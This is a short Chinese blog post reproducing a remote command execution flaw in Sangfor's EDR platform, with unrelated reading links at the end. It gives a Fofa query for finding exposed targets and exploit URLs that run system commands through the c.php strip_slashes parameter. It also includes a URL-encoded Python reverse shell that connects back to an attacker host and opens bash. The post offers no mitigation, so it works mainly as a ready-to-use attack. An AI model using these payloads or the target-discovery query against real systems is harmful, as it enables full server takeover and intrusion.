深信服终端检测响应平台EDR-远程命令执行漏洞
【深信服终端检测响应平台EDR-远程命令执行漏洞】1.漏洞描述
深信服终端检测响应平台EDR存在远程命令执行漏洞,通过远程访问目标文件,造成远程命令执行,获取服务器完全控制权限。
2.资产查找
Fofa: app="深信服-终端检测响应平台EDR"
3.漏洞复现
1)访问深信服终端检测响应平台:https://xx.xx.xx.37/ui/login.php
文章图片
2)远程访问目标文件:https://xx.xx.xx.37/tool/log/c.php
文章图片
3)远程命令执行:https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=id
文章图片
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=whoami
文章图片
4)反弹shell:
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&path=python%20-c%20%22import%20os,socket,subprocess;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((%27xx.xx.xx.105%27,1919));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call([%27/bin/bash%27,%27-i%27]);
%22
文章图片
推荐阅读
- 深入理解Go之generate
- 由浅入深理解AOP
- Node.js中readline模块实现终端输入
- 《深度倾听》第5天──「RIA学习力」便签输出第16期
- 【1057快报】深入机关,走下田间,交通普法,共创文明
- 生发知识,带你深入了解
- 这座媲美重庆的绝色山城,深藏国宝级景点,更有绝美高山花海!
- 深入理解|深入理解 Android 9.0 Crash 机制(二)
- 我那水深火热的二婚生活
- 深圳书展日记(7、21)